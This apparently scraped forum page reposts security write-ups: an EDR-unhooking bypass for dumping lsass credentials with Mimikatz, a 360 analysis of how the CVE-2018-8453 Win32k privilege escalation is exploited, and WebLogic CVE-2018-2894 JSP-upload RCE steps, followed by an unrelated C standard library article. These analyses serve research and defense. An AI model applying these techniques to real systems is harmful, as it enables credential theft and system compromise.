RCE by uploading a web.config – 003Random’s Blog
Security: HTTP Smuggling, Apsis Pound load balancer | RBleug
Piercing the Veil: Server Side Request Forgery to NIPRNet access
inputzero: A bug that affects million users - Kaspersky VPN | Dhiraj Mishra
inputzero: Telegram anonymity fails in desktop - CVE-2018-17780 | Dhiraj Mishra
inputzero: An untold story of skype by microsoft | Dhiraj Mishra
Neatly bypassing CSP – Wallarm
Large-Scale Analysis of Style Injection by Relative Path Overwrite - www2018rpo_paper.pdf
Beyond XSS: Edge Side Include Injection :: GoSecure
GitHub - HoLyVieR/prototype-pollution-nsec18: Content released at NorthSec 2018 for my talk on prototype pollution
Logically Bypassing Browser Security Boundaries - Speaker Deck
Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out
Web Cache Deception Attack - YouTube
Duo Finds SAML Vulnerabilities Affecting Multiple Implementations | Duo Security
#307670 Difference in query string parameter processing between Hacker News and Keybase Chrome extension spawns chat to incorrect user
lanmaster53.com
Beyond XSS: Edge Side Include Injection :: GoSecure
Scratching the surface of host headers in Safari
#309531 Stored XSS in Snapmatic + R★Editor comments
InsertScript: Adobe Reader PDF - Client Side Request Injection
$36k Google App Engine RCE - Ezequiel Pereira
MKSB(en): CVE-2018-5175: Universal CSP strict-dynamic bypass in Firefox
#341876 SSRF in Exchange leads to ROOT access in all instances
reCAPTCHA bypass via HTTP Parameter Pollution – Andres Riancho
Data Exfiltration via Formula Injection #Part1
Read&Write Chrome Extension Same Origin Policy (SOP) Bypass Vulnerability | The Hacker Blog
Firefox uXSS and CSS XSS - Abdulrahman Al-Qabandi
Server-Side Spreadsheet Injection - Formula Injection to Remote Code Execution - Bishop Fox
Bypassing Web-Application Firewalls by abusing SSL/TLS | 0x09AL Security blog
Evading CSP with DOM-based dangling markup | Blog
Save Your Cloud: DoS on VMs in OpenNebula 4.6.1
CRLF Injection Into PHP’s cURL Options – TomNomNom – Medium
Practical Web Cache Poisoning | Blog
#317476 Account Takeover in Periscope TV
A timing attack with CSS selectors and Javascript
VPN Extensions are not for privacy
Exposing Intranets with reliable Browser-based Port scanning | Blog
Exploiting XXE with local DTD files
A story of the passive aggressive sysadmin of AEM - Speaker Deck
Hunting for security bugs in AEM webapps - Speaker Deck
ASP.NET resource files (.RESX) and deserialisation issues
Story of my two (but actually three) RCEs in SharePoint in 2018 | Soroush Dalili (@irsdl) – سروش دلیلی
Beware of Deserialisation in .NET Methods and Classes + Code Execution via Paste!
cat ~/footstep.ninja/blog.txt Blog - RCE due to ShowExceptions
MB blog: Vulnerability in Hangouts Chat: from open redirect to code execution
Blog on Gopherus Tool
DNS Rebinding Headless Browsers
It's A PHP Unserialization Vulnerability Jim But Not As We Know It
James Kettle @albinowax
Sursa: https://portswigger.net/blog/top-10-web-hacking-techniques-of-2018-nominations-open
  19. Bypass EDR’s memory protection, introduction to hooking
Hoang Bui, Jan 18
Introduction
On a recent internal penetration engagement, I was faced with an EDR product that I will not name. This product greatly hindered my ability to access lsass’ memory and use our own custom flavor of Mimikatz to dump clear-text credentials.
The Wrong Path
So now, as an ex-malware author, I know that there are a few things you could do as a driver to accomplish this detection and block. The first thing that comes to my mind was ObRegisterCallbacks, which is commonly used by many antivirus products. Microsoft implemented this callback due to many antivirus products performing very sketchy WinAPI hooks that resemble malware rootkits. However, at the bottom of the MSDN page, you will notice a text saying “Available starting with Windows Vista with Service Pack 1 (SP1) and Windows Server 2008.” To give some missing context, I am on a Windows Server 2003 at the moment. Therefore, it is missing the necessary function to perform this block. After spending hours and hours doing black magic stuff with csrss.exe and attempting to inherit a handle to lsass.exe through csrss.exe, I was successful in gaining a handle with PROCESS_ALL_ACCESS to lsass.exe. This was through abusing csrss to spawn a child process and then inherit the already existing handle to lsass. (There is no EDR solution on this machine; this was just a PoC.) However, after thinking “I got this!” and being ready to rejoice in victory over a certain EDR, I was met with a disappointing conclusion. The EDR blocked the shellcode injection into csrss as well as the thread creation through RtlCreateUserThread. However, for some reason, the code, while failing to spawn as a child process and inherit the handle, was still somehow able to get the PROCESS_ALL_ACCESS handle to lsass.exe. WHAT?!
Hold up, let me try just opening a handle to lsass.exe without any fancy stuff, with just this line:
HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, lsasspid);
And what do you know, I got a handle with FULL CONTROL over lsass.exe. The EDR did not make a single fuss about this. This is when I realized I had started off on the wrong path: the EDR never really cared about you gaining the handle access. It is what you do afterward with that handle that will come under scrutiny.
Back on Track
Knowing there was no fancy trick needed to get a full-control handle to lsass.exe, we can now move forward to find the next point of the issue. Immediately calling MiniDumpWriteDump() with the handle failed spectacularly. Let’s dissect this warning further: “Violation: LsassRead”. I didn’t read anything, what are you talking about? I just want to do a dump of the process. However, I also know that to make a dump of a remote process, there must be some sort of WINAPI being called, such as ReadProcessMemory (RPM), inside MiniDumpWriteDump(). Let’s look at MiniDumpWriteDump’s source code in ReactOS. As you can see, the function dump_exception_info() (2), as well as many other functions, relies on RPM (3) to perform its duty. These functions are referenced by MiniDumpWriteDump (1), and this is probably the root of our issue. Now here is where a bit of experience comes into play. You must understand Windows system internals and how WINAPIs are processed. Using ReadProcessMemory as an example, it works like this. ReadProcessMemory is just a wrapper. It does a bunch of sanity checks, such as nullptr checks. That is all RPM does. However, RPM also calls a function, NtReadVirtualMemory, which sets up the registers before executing a syscall instruction. The syscall instruction just tells the CPU to enter kernel mode, where another function, ALSO named NtReadVirtualMemory, is called, which does the actual logic of what ReadProcessMemory is supposed to do.
Userland: RPM (kernel32) --> NtReadVirtualMemory (ntdll) --> SYSCALL | Kernel land: NtReadVirtualMemory (ntoskrnl)
With that knowledge, we now must identify HOW the EDR product is detecting and stopping the RPM/NtReadVirtualMemory call. The answer is simple: “hooking”. Please refer to my previous post regarding hooking for more information. In short, hooking gives you the ability to put your code in the middle of any function and gain access to its arguments as well as its return value. I am 100% sure that the EDR is using some sort of hook through one or more of the various techniques I mentioned there. However, readers should know that most if not all EDR products use a service, specifically a driver running in kernel mode. With kernel-mode access, the driver could place the hook at ANY level of RPM’s call stack. However, it would open a huge security hole in a Windows environment if any driver could trivially hook ANY level of a function. Therefore, on 64-bit Windows a solution was put forward to prevent modifications of this nature: Kernel Patch Protection (KPP, or PatchGuard). KPP scans the kernel on almost every level and triggers a BSOD if a modification is detected. This includes the ntoskrnl portion, which houses the kernel-level logic of the WinAPI. With this knowledge, we can be confident that the EDR would not, and did not, hook any kernel-level function in that portion of the call stack, leaving us with the user-land RPM and NtReadVirtualMemory calls. The Hook To see where a function is located in our application’s memory, a printf with the %p format string and the function name as the argument is enough. However, unlike RPM, NtReadVirtualMemory is not declared in the Windows SDK headers (although ntdll does export it), so you cannot just reference the function like normal.
You must declare the function’s signature yourself and link ntdll.lib into your project to do so. With everything in place, let’s run it and take a look! Now we have the addresses of both RPM and NtReadVirtualMemory. I will now use my favorite reversing tool, Cheat Engine, to read the memory and analyze its structure. For the RPM function, everything looks fine. It does some stack and register setup and then calls ReadProcessMemory inside KernelBase (a topic for another time), which eventually leads down into ntdll’s NtReadVirtualMemory. However, if you look at NtReadVirtualMemory and know what the most basic detour hook looks like, you can tell that this is not normal. The first 5 bytes of the function are modified and the rest are left as-is. You can tell this by looking at the similar functions around it. All the other functions follow a very similar format:
0x4C, 0x8B, 0xD1,             // mov r10, rcx   ; NtReadVirtualMemory
0xB8, 0x3C, 0x00, 0x00, 0x00, // mov eax, 3Ch   ; syscall ID
0x0F, 0x05,                   // syscall
0xC3                          // ret
The only difference between them is the syscall ID, which identifies the kernel function to be called once inside kernel land (the IDs also vary between Windows builds). For NtReadVirtualMemory, however, the first instruction is a JMP to an address somewhere else in memory. Let’s follow that. Okay, so we are no longer inside ntdll’s module but inside CyMemDef64.dll. Ahhhhh, now I get it. The EDR placed a jump instruction where the original NtReadVirtualMemory code is supposed to be, redirecting the code flow into its own module, which then checks for any sort of malicious activity. If the checks fail, the Nt* function returns with an error code, never entering kernel land and executing the call to begin with. The Bypass It is now self-evident what the EDR is doing to detect and stop our WinAPI calls. But how do we get around that? There are two solutions.
Re-Patch the Patch We know what the NtReadVirtualMemory function SHOULD look like, and we can easily overwrite the jmp instruction with the correct instructions. This stops our calls from being intercepted by CyMemDef64.dll, so they enter the kernel, where the EDR has no control. Ntdll IAT Hook We could also create our own function, similar to Re-Patch the Patch, but instead of overwriting the hooked function, we recreate it elsewhere. Then we walk Ntdll’s Import Address Table, swap out the pointer for NtReadVirtualMemory and point it to our new fixed_NtReadVirtualMemory. The advantage of this method is that if the EDR decides to check on its hook, the hook looks unmodified; it simply is never called, because the IAT points elsewhere. The Result I went with the first approach. It is simple, and it let me get the blog post out quicker :). However, it would be trivial to do the second method, and I plan on doing just that within a few days. Introducing AndrewSpecial, named for my manager Andrew, who is currently battling a busted appendix in the hospital. Get well soon, man. AndrewSpecial.exe was never caught :P Conclusion This currently works for this particular EDR; however, it would be trivial to reverse similar EDR products and create a universal bypass, due to their limitations around what they can and can’t hook (thank you, KPP). Did I also mention that this works on both 64-bit (on all versions of Windows) and 32-bit (untested)? And the source code is available HERE. Thank you again for your time, and please let me know if I made any mistakes. Source: https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6
  20. CVE-2018-8453: Win32k Elevation of Privilege Vulnerability Targeting the Middle East 2019-01-19 By 360 Threat Intelligence Center | Technical Research Background On October 10, 2018, Kaspersky disclosed a Win32k elevation-of-privilege exploit (CVE-2018-8453) captured in August. This vulnerability was used as a 0-day in attacks targeting the Middle East to escalate privileges on compromised Windows systems. It resides in the window management and graphics device interface component (win32kfull.sys) and can be used to elevate user privileges to SYSTEM. It can also be used to escape sandboxes such as those of PDF readers, Office and IE, which makes the exploit extremely valuable. 360 Threat Intelligence Center performed a deep analysis of this vulnerability and developed a PoC exploit that works on some of the affected Windows systems (both the x86 and x64 versions of Windows 10). Analysis Environment The work was performed on Windows 10 x64 Version 1709, with all patches prior to the fix for CVE-2018-8453. Root Cause This vulnerability is caused by a flaw in win32kfull!NtUserSetWindowFNID, which fails to check whether the window object has already been released before setting the FNID. As a result, a new FNID can be set on a window that has already been released (FNID_FREED: 0x8000). By exploiting this defect, we can control the fnDWORD callback invoked from xxxFreeWindow when the window object is destroyed, and cause a use-after-free (UAF) of pSBTrack in win32kfull!xxxSBTrackInit. About FNID: By checking the leaked Windows 2000 source code and related documentation in ReactOS, we found that the FNID records what kind of window it is, such as a button or an edit box. It can also record the state of the window; for example, FNID_FREED (0x8000) means the window has been released. PoC: How to Trigger the Vulnerability The vulnerability can be triggered with the following steps: Step 1: Hook two callbacks in the KernelCallbackTable. Step 2: Create the main window and the scroll bar.
Step 3: Send a WM_LBUTTONDOWN message to the scroll bar to trigger the call to xxxSBTrackInit. Hint: Left-clicking a scroll bar triggers a call to win32kfull!xxxSBTrackInit. After that, xxxSBTrackLoop is called to capture mouse events in a loop until the left mouse button is released or certain other messages are received. Step 4: Call DestroyWindow(g_hMAINWND) in the callback function fnDWORD_hook when it is executed by xxxSBTrackLoop. This results in a call to win32kfull!xxxFreeWindow. Because cbWndExtra was not 0 when the main window was registered, win32kfull!xxxFreeWindow calls xxxClientFreeWindowClassExtraBytes to release the extra data belonging to the main window. That function executes the KernelCallbackTable[126] callback, which results in a call to our second hook. Step 5: Inside our second hook function (fnClientFreeWindowClassExtraBytesCallBack_hook), we manually call NtUserSetWindowFNID(g_hMAINWND, spec_fnid) to set the FNID of the main window (a value from 0x2A1 to 0x2AA; here we set spec_fnid to 0x2A2). Meanwhile, we create a new scroll bar (g_hSBWNDNew) and call SetCapture(g_hSBWNDNew) to make g_hSBWNDNew the window that captures mouse events in the current thread. Step 6: Since the main window is destroyed, xxxSBTrackLoop returns and continues to execute HMAssignmentUnlock(&pSBTrack->spwndSBNotify), dropping the reference that kept the main window alive so that it gets released completely. This causes xxxFreeWindow to be called again. Each time xxxFreeWindow runs, it marks the window's FNID with 0x8000. Since the FNID of the main window was set to 0x2A2 in step 5, LOWORD(FNID) is now 0x82A2 (the DestroyWindow call in step 4 already ran xxxFreeWindow, which marked the main window with 0x8000). So SfnDWORD is executed, and we get into our hook again through the fnDWORD callback.
When we get into fnDWORD_hook again, it is our last chance to return to ring 3 (user mode). At this point, if SendMessage(g_hSBWNDNew, WM_CANCELMODE) is called, xxxEndScroll (see the Windows 2000 source) is executed and releases pSBTrack. Because the PoC program is single-threaded, all windows created by the thread point to the same thread information structure. Even though the scroll bar window that SBTrack belongs to has been released, pSBTrack still points to the same structure as long as the new window is created by the same thread. The condition qp->spwndCapture == pwnd is satisfied, since we send the WM_CANCELMODE message to the newly created scroll bar g_hSBWNDNew and have previously called SetCapture(g_hSBWNDNew) to make g_hSBWNDNew the window capturing mouse events in the current thread. Finally, UserFreePool(pSBTrack) is executed, freeing pSBTrack before HMAssignmentUnlock(&pSBTrack->spwndSB) runs and resulting in a use-after-free of pSBTrack. Exploit on Windows 10 x64 Since hooking callbacks in KernelCallbackTable lets us free the pSBTrack used in win32kfull!xxxSBTrackInit early, causing a use-after-free, pool feng shui can be used to reoccupy the freed pSBTrack memory and achieve arbitrary memory value deduction in a loop. Combined with a desktop heap [2] leak and the GDI Palette abuse technique, this yields arbitrary memory read/write and, finally, privilege escalation! Implementation of Arbitrary Memory Value Deduction From the above analysis, we know that the memory pointed to by pSBTrack has been released after calling HMAssignmentUnlock(&pSBTrack->spwndSBNotify). Continuing to the next call, HMAssignmentUnlock(&pSBTrack->spwndSB), and looking at the disassembly of HMAssignmentUnlock, you will find a very interesting instruction: executing lock xadd dword ptr [rdx+8], eax decrements the DWORD at rdx+8 by one.
After debugging the code, we found that pSBTrack->spwndSB is loaded into rdx. So if we can control the value of pSBTrack->spwndSB, we can decrement any DWORD in memory by one. pSBTrack is released after we call SendMessage(g_hSBWNDNew, WM_CANCELMODE). So if we immediately allocate an object (such as a Bitmap) with the same size as SBTrack and whose data we control, there is a good chance that the freed pool memory will be reassigned to that object. Similarly, the following HMAssignmentUnlock(&pSBTrack->spwndSBTrack) call performs another decrement, this time on the memory at pSBTrack->spwndSBTrack + 8. So by controlling the data in the Bitmap sprayed into the space previously used by pSBTrack, we can reduce an arbitrary memory value by one or two per trigger. Decrementing by one only requires one of pSBTrack->spwndSB and pSBTrack->spwndSBTrack to be 0 and the other to be address - sizeof(PVOID) (address - 8 on x64, matching the +8 offset above). By triggering this process repeatedly, we can reduce the memory value many times until it reaches a specified number:
result = original - repeat_count        (decrement by one per trigger)
result = original - 2 * repeat_count    (decrement by two per trigger)
Obviously, we have to know the original value first in order to reduce it to the value we want, so this approach has some limitations compared with setting the value directly. Hint: If we need to change 0x02000000 to 0x00000000, do we need to repeat the minus-two operation 0x01000000 times? The answer is no. Because we can decrement any DWORD in memory by one or two, we can shift the target address so that the byte 0x02 becomes the low byte of the DWORD being decremented. The task then becomes changing 0x00000002 to 0x00000000, which needs just one iteration, with no need to worry about loop count limitations. Use the GDI Palette to Achieve Arbitrary R/W Below is the PALETTE data structure:
typedef struct _PALETTE64 {
    BASEOBJECT64 BaseObject;
    ...
    ULONG64 pRGBXlate;
    PALETTEENTRY *pFirstColor;
    struct _PALETTE *ppalThis;
    PALETTEENTRY apalColors[3];
}
The member apalColors is an array; each element is 4 bytes in size and its content can be specified by the user. pFirstColor, similar to the pvScan0 pointer in a Bitmap, points to this array and can be used to construct the R/W primitive. The following relationship holds, which tells us the initial value of pFirstColor (the address it points to):
Address of apalColors (the first PALETTEENTRY) = Address of pFirstColor + sizeof(PVOID) * 2
Just as a Bitmap's pixel data is manipulated through GetBitmapBits and SetBitmapBits, a Palette uses GetPaletteEntries and SetPaletteEntries to manipulate the data pointed to by pFirstColor. So we can construct two Palettes, named hManager and hWorker. If we know where hManager's pFirstColor and hWorker's pFirstColor are, we can use the arbitrary memory value deduction approach above to reduce hManager->pFirstColor until it points to hWorker's pFirstColor. After that, we can call SetPaletteEntries on hManager to control hWorker->pFirstColor, then call SetPaletteEntries and GetPaletteEntries on hWorker to achieve arbitrary memory read/write. Fortunately, the following techniques let us reliably determine hManager's and hWorker's pFirstColor and make hManager's pFirstColor value only slightly larger than hWorker's. Use the Desktop Heap to Leak the GDI Palette Address A window menu name can be quite long, so lpszMenuName and Palette objects end up in the same memory pool; and since we can get the kernel address of lpszMenuName through the tagWND pointer returned by HMValidateHandle, we can use the desktop heap [2] to help predict the kernel address of the pFirstColor pointer. With proper construction, the accuracy can reach 100%.
First, we repeatedly create and delete a window object to allocate and release a hole. Once the address stops changing, the next Palette object we construct with a size equal to lpszMenuName will be allocated at the address of the lpszMenuName that has just been released. Then we can get the kernel address of pFirstColor from its offset inside _PALETTE64. hManager->pFirstColor can then be reduced until it points to hWorker's pFirstColor using the arbitrary deduction operation above, giving arbitrary memory read/write. Privilege Escalation by Arbitrary Memory R/W With arbitrary memory read/write available, we can walk the EPROCESS chain to get the token value of the System process as well as the token address of the current process. Then we can escalate privileges by copying the System process's token value into the current process. How do we get the System process's EPROCESS from user mode? You can get it by looking up PsInitialSystemProcess [3] in ntoskrnl.exe. The exploit then locates the _EPROCESS of the current process and uses arbitrary memory read/write to copy the token. Exploit Process in Summary 360 Threat Intelligence Center summarized the entire process as follows:
1. Get the pFirstColor values of hManager and hWorker using the desktop heap leak technique.
2. Trigger the vulnerability multiple times so that hManager->pFirstColor points to hWorker's pFirstColor.
3. Perform privilege escalation with arbitrary memory read/write.
4. Use arbitrary memory read/write to trick the operating system into not cleaning up the Bitmap object. Without this step, the system releases the Bitmap object when the program exits, which causes a double free and a blue screen.
Patch Analysis Using BinDiff, we found that the patched win32kfull!NtUserSetWindowFNID calls IsWindowBeingDestroyed to check whether the window is being destroyed before setting a new FNID.
It returns immediately if the window object is being destroyed and does not allow a new FNID value to be set. So after we call DestroyWindow, our call to NtUserSetWindowFNID to set the FNID fails. This fixes the vulnerability, since it prevents us from releasing pSBTrack early. Conclusion After our investigation, we developed a PoC exploit for Windows 10 Pro v1709 x86/x64 and achieved privilege escalation successfully on an unpatched system. For other Windows versions, only the offsets of the corresponding data structures need to change, such as the offset of Token inside _EPROCESS. References
[1] https://securelist.com/cve-2018-8453-used-in-targeted-attacks/88151/
[2] https://blogs.msdn.microsoft.com/ntdebugging/2007/01/04/desktop-heap-overview/
[3] https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/mm64bitphysicaladdress
[4] https://mp.weixin.qq.com/s/ogKCo-Jp8vc7otXyu6fTig
[5] https://www.anquanke.com/post/id/168572#h2-1
[6] https://www.anquanke.com/post/id/168441#h2-0
[7] ed2k://|file|cn_windows_10_multi-edition_vl_version_1709_updated_sept_2017_x64_dvd_100090774.iso|4630972416|8867C5E54405FF9452225B66EFEE690A|/
Source: https://ti.360.net/blog/articles/cve-2018-8453-win32k-elevation-of-privilege-vulnerability-targeting-the-middle-east-en/
  21. [Video] Proof of Concept: CVE-2018-2894 Oracle WebLogic RCE Kristian Bremberg / November 14, 2018 A recent vulnerability affecting Oracle WebLogic Server was submitted to Crowdsource. The vulnerability is an unauthenticated remote code execution (RCE) that is easily exploited. In this article we go through the technical aspects of the Oracle WebLogic RCE vulnerability and its exploitation. How the exploit works: The vulnerability affects the Web Services (WLS) subcomponent. The path /ws_utc/config.do (on port 7001) is reachable by default without any authentication; however, this page is only available in development mode. To exploit the vulnerability, the attacker needs to set a new Work Home Dir that is writable. The path servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css works for this. Once the new writable Work Home Dir is set, it is possible to upload a JSP file in the Security tab. The Work Home Dir is the path where uploaded JKS keystores are saved, and the page lets an attacker upload arbitrary files as "JKS keystores", including Java Server Pages (JSP) files. These uploaded files can then be accessed and executed. The upload is done as a multipart/form-data request to the path ws_utc/resources/setting/keystore. The server then responds with XML containing the keyStoreItem ID, which is used to reach the uploaded file in the format /ws_utc/css/config/keystore/1582617386107_filename.jsp. Impact: If an attacker exploits this vulnerability, they may be able to completely compromise the server. However, since the test page only exists in development mode, it is very important to check that your WebLogic server is not running in development mode.
In some cases port 7001 is filtered and therefore not reachable from the Internet. For an attacker, this vulnerability is very easy to detect: WebLogic is easily fingerprinted (by its Server header), and a quick search on Shodan shows that many instances are exposed to the Internet. Additional information: For the full security advisory about the Oracle WebLogic RCE, see the Oracle Critical Patch Update Advisory. Written by Kristian Bremberg, edited by Jocelyn Chan. Source: https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/
  22. Inside the C Standard Library January 19, 2019 After diving into the C language through K&R, and then studying portability (see C Portability Lessons from Weird Machines), my next challenge was to take a systematic look at the standard library. To do this I worked through P. J. Plauger’s book The Standard C Library (ISBN 978-0131315099), in which he examines an implementation of all the functions. It has a chapter for each header, with background information, an excerpt from the C89 standard, tips on use, and a full implementation with tests. The author was on the X3J11 committee that defined ANSI C. As I worked through the book (first trying to write the examples myself, then comparing his code to mine, and finally running the examples), I kept notes with questions about portability, rationale, and C behavior. By cross-referencing the following books, asking questions on IRC, and browsing StackOverflow and the comp.lang.c archives, I found satisfactory answers.
“The C Standard: Incorporating Technical Corrigendum 1” by The British Standards Institution (ISBN 978-0470845738). This is the C99 standard itself (rather than C89 like Plauger’s book), and it includes an entire first half devoted to the rationale behind language and library choices. This is helpful for understanding C semantics.
“Portable C Software” by Mark R. Horton (ISBN 978-0138680503). Written after ANSI C was standardized, but early enough that it wasn’t yet fully adopted. He provides early history of each standard library function, as well as some functions that are now defunct.
“Portable C” by Henry Rabinowitz (ISBN 978-0136859673). Great for illustrating the design decisions of the language as they relate to diverse hardware.
“The CERT C Coding Standard” by Robert C. Seacord (ISBN 978-0321984043). Illustrates potential insecurity in, among other things, the standard library. Lists real code that caused vulnerabilities.
“C Programming FAQs” by Steve Summit (ISBN 978-0201845198).
I can see why these were historically the most frequently asked questions. I asked many of them myself. This article is not a comprehensive explanation of the standard by any means. It’s just things that were new or interesting to me. Some of it may be old news to you, and conversely I may have omitted something that seemed basic to me but would have been useful to mention. The focus is C89, with comparisons to the later standards C99 and C11 when relevant. Brief History of the Library Functions in the library grew organically from communities of programmers sharing ideas and implementations. Many groups of people used C on Unix throughout the 70s, across multiple architectures. They wrote compilers with extra features, and experimented with additions to Unix. By February 1978 core C practice had stabilized to the point where Kernighan and Ritchie codified it in the first edition of their book The C Programming Language (ISBN 978-0131101630). By 1980 C users formed the “/usr/group” organization to combine their library experience into an informal standard, which they released in 1984. Meanwhile in 1983, the American National Standards Institute (ANSI) formed a committee, X3J11, to establish a standard specification of C and officially standardize the library. The committee reviewed the work of /usr/group, K&R 1st edition, and various compiler extensions. They deliberated from 1983 to 1989 to produce the C89 standard (“ANSI C”). “Design by committee” may not have pleasant associations for some people, but in this case the committee drew on a lot of experience, and often declined to speculatively innovate, working to clarify existing practice instead. The result was a small, tight language and standard library. Compared with libraries in other languages, the standard C library is lean. It doesn’t have much in the way of general algorithms or containers. This helped the language port easily and more widely. 
The library has basic facilities for time, math, I/O, etc., and operates on simple types. It also provides portable facilities to do non-portable things, like variadic arguments and non-local gotos. assert.h A simple way to halt a program with debugging information if an assumption doesn’t hold:
#include <assert.h>
int main(void) { assert(1 == 0); }

/* outputs
Assertion failed: (1 == 0), function main, file assert.c, line 2.
Abort trap: 6
*/
Because it echoes the statement under test and includes a filename and line number, it’s useful for a quick and dirty test suite. Furthermore, assert() calls abort() rather than exit(), which causes the program to quit and dump core if permitted by the operating system. If the binary was compiled with debugging support, you can load that core file in a debugger together with the program and inspect the program’s full state at the time the assertion failed:
gdb /path/to/program /path/to/corefile
# ^^^ inspect variables, backtrace, etc. in the debugger
This means that liberally littering functions with assertions can be a good way to debug problems. It provides richer information than debug print statements in situations where it’s OK to terminate the program. It also adds no overhead to the final release, because the assertions are removed by the preprocessor when the code is compiled with NDEBUG defined. This can be done by adding -DNDEBUG to CFLAGS or by putting a regular #define NDEBUG in the code before assert.h is included. All headers in the standard library are idempotent, except assert.h. By including it multiple times in a file you can enable or disable the assert macro:
#define NDEBUG
#include <assert.h>
/* Now assert() won't do anything... */

#undef NDEBUG
#include <assert.h>
/* Now assert() works again */
It’s OK to include assert.h twice in a row because it causes what C calls a “benign” redefinition of the assert macro.
/* no harm, this is a benign redefinition: */
#define FUN 1
#define FUN 1

/* not benign and not allowed: */
#define FUN 1
#define FUN 2
A properly designed assert macro should work in any context, even somewhere weird like for (i = 0, assert(n < 10); i < n; ++i). Because I didn’t think of this, my own attempt at writing assert used an if statement. In fact, this is what Mark Horton shows in his Portable C Software book:
/* incorrect definition */
#ifndef NDEBUG
#define assert(p) (if(!(p)) ... )
#else
#define assert(p) ;
#endif
This can be improved. Plauger uses the ternary operator and substitutes ((void)0) when the predicate holds, so the macro stays an expression that is usable anywhere. He also keeps the code that prints the error and aborts in a real function defined in a separate source file, because headers in his library never include each other (printing from the macro itself would require assert.h to include stdio.h). It’s a self-imposed discipline. The last trick I found interesting was how to delay preprocessor evaluation into two steps using these helpers:
/* a "thunk" to evaluate __LINE__ */
#define _STR(x) _VAL(x)
#define _VAL(x) #x
The string can then be built as
"Assertion failed: " #p ", file " __FILE__ ", line " _STR(__LINE__) "\n"
Finally, some implementations tolerate an arbitrary scalar expression as the argument to assert, but the ANSI committee decided to require int expressions for correct operation. Given that it was the first header I saw in Plauger’s book, this is where I learned that the standard reserves names like _Foo, starting with an underscore and a capital letter, for the implementation. Don’t use that naming convention in regular code. ctype.h Although I learned a few things from this header, it was ultimately kind of a letdown. It’s not sufficient for international text processing because, while the functions operate on the int type, they specify that its value should fall in the range of unsigned char or be the negative value EOF.
So while non-English speakers can use a different codepage for their locale, it cannot hold more than 255 symbols (plus \0, plus EOF), which is too few for East Asian languages. C95 (Amendment 1 to C89) introduced wctype.h to operate on wide characters, but that has its own problems. (More about that in the stdlib.h section below.) Even for languages that fit in an 8-bit codepage, the ctype functions don’t always suffice. For example, the German letter ß uppercases into two letters, SS. The toupper() function in ctype.h can’t handle that, because it only replaces one character with another. The Greek letter Σ ordinarily lowercases to σ, except at the end of a word, where it should be ς. The tolower() function doesn’t have enough context to pick the correct form. I still learned some interesting techniques by studying this header. Plauger implements all the isxxxxx() functions with a lookup table of bit-packed shorts. The table itself is specific to EOF (from stdio.h) being -1, and relies on a certain size of unsigned char. The code uses a nice trick to fail early on a system where this assumption is incorrect:
#include <limits.h>
#include <stdio.h>

#if EOF != -1 || UCHAR_MAX != 255
#error WRONG TABLES IN CTYPE.H
#endif
Although the code is non-portable, it fails in the most honest and upfront way possible: at compile time. Also, as a historical note, the isxxxxx() functions used to be defined only for 7-bit characters, but ANSI requires them to handle all values of unsigned char. One advantage of using a lookup table is that the argument is evaluated only once. Thus the lookup function can be a macro without the danger of executing a side effect more than once.
/* evaluates c at least twice */
#define isalpha(c) \
    (((c) >= 'a' && (c) <= 'z') || ((c) >= 'A' && (c) <= 'Z'))

/* evaluates c only once */
#define isalpha(c) (_Ctype[(int)(c)] & (_LO|_UP))

/* consider how this would behave */
if (isalpha(c = getchar())) ...
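To see the single-evaluation property in action, here is a small sketch. UNSAFE_ISALPHA, TABLE_ISALPHA, init_alpha_table and next_char are hypothetical names; the table is a simplified one-bit cousin of the bit-packed table described above, not Plauger's code. It assumes EOF is -1 (checked at compile time in the same spirit as his #error) and shifts its lookup pointer by one so that EOF indexes a valid slot.

```c
#include <assert.h>
#include <ctype.h>
#include <limits.h>
#include <stdio.h>

/* Fail at compile time if the shifted-table assumption does not hold. */
#if EOF != -1
#error "this sketch assumes EOF == -1"
#endif

/* Hypothetical macro in the style of the two-comparison definition:
   it can mention c up to four times. */
#define UNSAFE_ISALPHA(c) \
    (((c) >= 'a' && (c) <= 'z') || ((c) >= 'A' && (c) <= 'Z'))

/* Hypothetical table: one slot per unsigned char value plus slot 0 for EOF.
   The pointer is shifted by one, so ALPHA_TAB[EOF] reads alpha_slots[0]. */
static unsigned char alpha_slots[UCHAR_MAX + 2];
static const unsigned char *const ALPHA_TAB = &alpha_slots[1];
#define TABLE_ISALPHA(c) (ALPHA_TAB[(c)] != 0) /* c appears exactly once */

void init_alpha_table(void)
{
    /* List the letters explicitly instead of assuming 'a'..'z' is contiguous. */
    static const char letters[] =
        "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    const char *p;

    for (p = letters; *p != '\0'; ++p)
        alpha_slots[(unsigned char)*p + 1] = 1;
    assert(!TABLE_ISALPHA(EOF)); /* the EOF slot stays clear */
}

/* Stand-in for getchar(): always returns 'm' and counts its calls. */
static int calls;
static int next_char(void)
{
    ++calls;
    return 'm';
}

/* Each helper reports how many times the macro evaluated its argument. */
int calls_unsafe(void) { calls = 0; (void)UNSAFE_ISALPHA(next_char()); return calls; }
int calls_table(void)  { calls = 0; (void)TABLE_ISALPHA(next_char());  return calls; }
int calls_std(void)    { calls = 0; (void)isalpha(next_char());        return calls; }
```

For 'm', the two-comparison macro calls next_char twice (the first && pair is true, so || stops there), while the table lookup calls it once. The library's own isalpha also calls it once, since the standard requires library macros to evaluate each argument exactly once.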
Using macros for these little functions is good for performance. However, every function in the standard library (unless specifically noted otherwise) must also exist as an actual function, in case a program wishes to pass its address as a parameter to another function. How can we define a function called “isalpha” if that name is also recognized by the preprocessor? I learned you can just enclose the name in parentheses:
int (isalpha)(int c)
{
    return (_Ctype[(int)(c)] & (_LO|_UP));
}
/* now &isalpha will be defined if needed */
The trick is used throughout the standard library, but I first saw it in ctype. Conversely, every library function is a candidate for redefinition as a macro, provided that the macro evaluates each of its arguments exactly once and parenthesizes them thoroughly. (Well, getc is an exception, but more on that later.) Another trick is to perform an array lookup using a pointer that is shifted forward in the original array:
static const short ctyp_tab[257] = {0, /* ... */};
const short *_Ctype = &ctyp_tab[1];
